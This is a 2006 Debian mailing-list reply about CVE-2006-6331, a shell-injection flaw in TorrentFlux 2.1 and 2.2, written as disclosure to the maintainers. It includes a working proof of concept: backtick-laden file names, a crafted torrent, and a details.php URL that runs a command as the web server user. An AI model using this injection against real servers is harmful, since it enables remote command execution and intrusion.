On 12/6/06, Cameron Dale <[EMAIL PROTECTED]> wrote:
> ======================================================
> Name: CVE-2006-6331
> Status: Candidate
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331
> Reference:
> CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
> Reference:
>
MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1
>
> metaInfo.php in TorrentFlux 2.2, when $cfg["enable_file_priority"] is
> false, allows remote attackers to execute arbitrary commands via shell
> metacharacters (backticks) in the torrent parameter to details.php.
This problem, as described, is not present in 2.2, only in 2.1. Also,
the dpatch attached is a a little misleading as it contains changes
that fix the 2 previous problems (6329 and 6330) as well as this one
(6331).
There is, however, a similar problem to this in 2.2 that Stefan
described as a "local priviledge escalation". It uses the torrent
parameter and a local user's ability to create a file containing
backticks, to then execute arbitrary commands as the webserver user
(www-data). I don't think it applies to remote users though, only
local. You may want to request another CVE for this one, as it is a
separate problem from 6331 and does affect version 2.2.
Actually, on further investigation, I was wrong about this one, as it
is a remote command execution bug in 2.2 as well, and I recommend you
report it as such. I had thought that TorrentFlux's cleaning of the
downloaded torrent files would make this local only, but I now see
that a torrent file that includes files that have backticks will work
(sorry Stefan, I misread your previous email about this). Here is how
to properly take advantage of this in Torrentflux 2.2 (or 2.1):
mkdir -p '`touch /tmp/'
echo "Test file" > '`touch /tmp/hello`.torrent'
btmakemetafile --target test.torrent http://localhost:6969 \`touch\ /
Now upload test.torrent to TorrentFlux and start it downloading (it
won't download anything, but that doesn't matter as the files are
created when the torrent starts).
Now go to (replace username with your TorrentFlux user name):
http://hostname/torrentflux/details.php?torrent=../username/`touch
/tmp/hello`.torrent
It should say only "btshowmetainfo 20030621 - decode BitTorrent
metainfo files" and the /tmp/hello file should be created as the web
server user (www-data).
Cameron
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
